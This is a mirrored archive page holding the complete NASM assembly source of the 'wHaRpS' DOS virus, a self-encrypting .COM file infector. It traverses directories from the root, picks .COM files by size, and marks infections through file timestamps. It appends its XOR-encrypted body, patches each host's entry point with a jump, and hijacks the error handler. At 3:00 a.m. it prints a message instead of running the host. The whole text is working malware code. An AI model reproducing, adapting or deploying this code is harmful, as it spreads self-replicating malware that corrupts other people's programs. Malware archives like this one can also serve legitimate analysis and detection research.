mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
337 lines
10 KiB
NASM
337 lines
10 KiB
NASM
; "One must crawl before one walks."
|
||
; wHaRpS Virus 1.0
|
||
; wHaRpS virus of independent virus writer FirstStrike
|
||
; For use by [Phalcon\Skism] ONLY!
|
||
; Special thanx to:
|
||
; Gheap
|
||
; Dark Angel
|
||
; Demogorgon
|
||
|
||
|
||
name wHaRpS
|
||
title
|
||
code segment
|
||
assume cs:code,ds:code
|
||
org 100h
|
||
|
||
|
||
dta equ 65000d ; DTA address to be set
|
||
fname equ 65000d + 1eh ; DTA - file name
|
||
ftime equ 65000d + 16h ; DTA - file time
|
||
fsize equ 65000d + 1ah ; DTA - file size
|
||
orgdir equ 65400d ; original path storage
|
||
date equ 65300d ; store file date
|
||
time equ 65302d ; store file time
|
||
attrib equ 65304d ; store file attrib
|
||
err1 equ 65306d ; old error handler address
|
||
err2 equ 65308d ; old error handler address
|
||
|
||
olddta equ 80h ; original DTA address
|
||
|
||
|
||
|
||
begin:
|
||
nop
|
||
nop
|
||
nop
|
||
call setup ; find "delta offset"
|
||
setup:
|
||
pop bp
|
||
sub bp, offset setup
|
||
jmp main ; DEBUG E8 02 00
|
||
nop
|
||
jmp main
|
||
|
||
crypt_em:
|
||
xor di,di
|
||
lea si, [bp+main]
|
||
mov di, si
|
||
mov cx, end_crypt - main
|
||
|
||
xor_loop:
|
||
lodsb ; ds:[si] -> al
|
||
db 34h ; xor al, XX
|
||
encrypt_val db 0 ; Starting encryption value is 0
|
||
stosb ; al ->es:[di]
|
||
loop xor_loop
|
||
ret
|
||
|
||
main:
|
||
xor di,di
|
||
mov di,0100h ; Restore first three
|
||
lea si,[bp+saveins] ; original program bytes
|
||
mov cx,0003d
|
||
rep movsb
|
||
jmp system_pic ; Take a "picture" of system settings
|
||
|
||
handler: ; error handler
|
||
mov al,0
|
||
iret
|
||
endp
|
||
|
||
|
||
data label byte
|
||
wharps db '[wHaRpS]',0 ; wHaRpS ID
|
||
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Me
|
||
dir_mask db '*.',0 ; dir atrib
|
||
allcom db '*.COM',0 ; what to search for
|
||
root db '\',0 ; root
|
||
saveins db 0e8h,00h,00h ; original three bytes
|
||
ultimate dw 0 ; ultimate dir to be reached
|
||
current dw 0 ; current dir
|
||
message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $'
|
||
|
||
system_pic: ; SNAP!
|
||
mov ah,47h ; get original path
|
||
mov dl,0
|
||
lea si,cs:orgdir ; store original path
|
||
int 21h
|
||
|
||
crypt_change: ; set crypt value
|
||
mov ah,2ch
|
||
int 21h
|
||
mov [bp+encrypt_val],dl
|
||
cmp ch,03
|
||
jz more
|
||
jmp errorh
|
||
|
||
more:
|
||
cmp cl,00
|
||
jz bomb
|
||
jmp errorh
|
||
|
||
bomb:
|
||
mov ah,09h
|
||
lea dx,[bp+message]
|
||
int 21h
|
||
mov ah,4ch
|
||
int 21h
|
||
|
||
errorh:
|
||
push es ; save original error handler address
|
||
mov ax,3524h
|
||
int 21h
|
||
mov word ptr cs:err1,bx
|
||
mov word ptr cs:err2,es
|
||
pop es
|
||
|
||
mov ax,2524h ; set an error handler
|
||
lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals
|
||
int 21h
|
||
jmp pre_search
|
||
|
||
drop_to_root: ; subroutine to visit the root
|
||
lea dx,[bp+root]
|
||
jmp continue
|
||
|
||
set_path: ; OR set a path
|
||
lea dx,cs:fname
|
||
|
||
continue:
|
||
mov ah,3bh
|
||
int 21h
|
||
ret
|
||
|
||
return_to_search:
|
||
inc [bp+ultimate]
|
||
call drop_to_root
|
||
mov [bp+current],0000
|
||
jmp find_first_dir
|
||
|
||
|
||
pre_search: ; set a DTA
|
||
mov dx,dta
|
||
mov ah,1ah
|
||
int 21h
|
||
|
||
mov [bp+current],0000 ; zero the counters
|
||
mov [bp+ultimate],0000 ; ""
|
||
inc [bp+ultimate] ; want to search 1st dir in root
|
||
call drop_to_root ; bomb to root
|
||
|
||
find_first_dir: ; directory searchin'
|
||
lea dx,[bp+dir_mask]
|
||
mov cx,16
|
||
mov ah,4Eh
|
||
int 21h
|
||
jc almost_done ; no directories?
|
||
|
||
dir_test:
|
||
inc [bp+current] ; directory found - MARK!
|
||
mov bx,[bp+current]
|
||
cmp word ptr [bp+ultimate],bx ; is it the one we want?
|
||
jnz find_next_dir ; no, find another
|
||
call set_path ; yes, set the correct path
|
||
jmp find_first_file ; find some .COMs
|
||
|
||
|
||
|
||
find_next_dir: ; mo' directory searchin'
|
||
mov ah,4fh
|
||
int 21h
|
||
jc almost_done
|
||
jmp dir_test ; go see if correct dir found yet
|
||
|
||
|
||
|
||
find_first_file: ; file searchin'
|
||
lea dx,[bp+allcom]
|
||
mov cx,00000001b
|
||
mov ah,4Eh
|
||
int 21h
|
||
jc return_to_search ; no .COM so mo' dir
|
||
jmp check_if_ill ; is the file "sick"?
|
||
|
||
|
||
|
||
find_next_file: ; keep on a searchin'
|
||
mov ah,4fh
|
||
int 21h
|
||
jc return_to_search ; no more .COM so back
|
||
; to the directories
|
||
|
||
check_if_ill: ; check file's health
|
||
mov ax,cs:ftime
|
||
and al,11111b ; good, your sick!
|
||
cmp al,62d/2 ; (No more 62 seconds as virus
|
||
jz find_next_file ; markers! - I swear!)
|
||
|
||
cmp cs:fsize,60000d ; whoa, file to big!
|
||
ja find_next_file ; so, get a new one
|
||
|
||
cmp cs:fsize,500d ; whoa, file to small!
|
||
jb find_next_file ; throw it back and move on
|
||
jmp infect ; perfect, for infection
|
||
|
||
db 'Joy J.',0 ; don't ask
|
||
|
||
error:
|
||
pre_done:
|
||
almost_done:
|
||
jmp done ; in case of emergency.....
|
||
|
||
infect:
|
||
mov ah,43h ; save original attribute
|
||
mov al,00h
|
||
lea dx,cs:[fname]
|
||
int 21h
|
||
mov cs:attrib,cx
|
||
jc pre_done
|
||
|
||
mov ax,4301h ; clear all attributes
|
||
and cx,11111110b ; (none shall slow progress)
|
||
int 21h
|
||
jc pre_done
|
||
|
||
|
||
mov ax,3d02h ; open the file, please
|
||
int 21h
|
||
jc pre_done
|
||
xchg bx,ax
|
||
|
||
|
||
|
||
mov ax,5700h ; save the date/time
|
||
int 21h
|
||
mov cs:time,cx
|
||
mov cs:date,dx
|
||
jc pre_done
|
||
|
||
|
||
mov ah,3Fh ; read first 3 bytes of file
|
||
mov cx,0003h ; to be infected and save
|
||
lea dx,[bp+saveins]
|
||
int 21h
|
||
jc pre_done
|
||
|
||
mov ax,4202h ; move to end of file
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
jc pre_done
|
||
mov [bp+new_jmp],ax
|
||
|
||
call crypt_em
|
||
|
||
end_crypt label byte ; encrypt to here
|
||
|
||
mov ah,40h
|
||
mov cx,endcode-begin
|
||
lea dx,[bp+begin]
|
||
int 21h ; encrypt n' write virus to end of
|
||
jc done ; file
|
||
|
||
mov ax,4200h ; go to beginning of file
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
jc done
|
||
jmp cont
|
||
|
||
jmpc db 0e9h
|
||
new_jmp dw ?
|
||
|
||
cont:
|
||
mov ah,40h
|
||
mov cl,3
|
||
lea dx,[bp+jmpc]
|
||
int 21h
|
||
jc done
|
||
|
||
attrib_stuff:
|
||
|
||
mov ax,5701h
|
||
mov cx,cs:[time]
|
||
mov dx,cs:[date]
|
||
or cl,11111b
|
||
int 21h
|
||
jc done
|
||
|
||
mov ah,3eh
|
||
int 21h
|
||
jc done
|
||
|
||
mov ax,4301h
|
||
mov cx,cs:[attrib]
|
||
lea dx,cs:[fname]
|
||
int 21h
|
||
jc done
|
||
|
||
done:
|
||
mov dx,olddta ; restore all changes
|
||
mov ah,1ah
|
||
int 21h
|
||
|
||
push ds
|
||
mov ax,2524h
|
||
lea dx,cs:[err2]
|
||
mov ds,dx
|
||
lea dx,cs:[err1]
|
||
int 21h
|
||
pop ds
|
||
|
||
mov ah,3bh
|
||
mov dx,'/'
|
||
int 21h
|
||
|
||
mov ah,3bh
|
||
lea dx,cs:[orgdir]
|
||
int 21h
|
||
|
||
xor di,di
|
||
mov di,0100h
|
||
jmp di ; good_bye
|
||
|
||
|
||
|
||
|
||
endcode label byte
|
||
|
||
|
||
|
||
|
||
code ends
|
||
end begin
|
||
|
||
|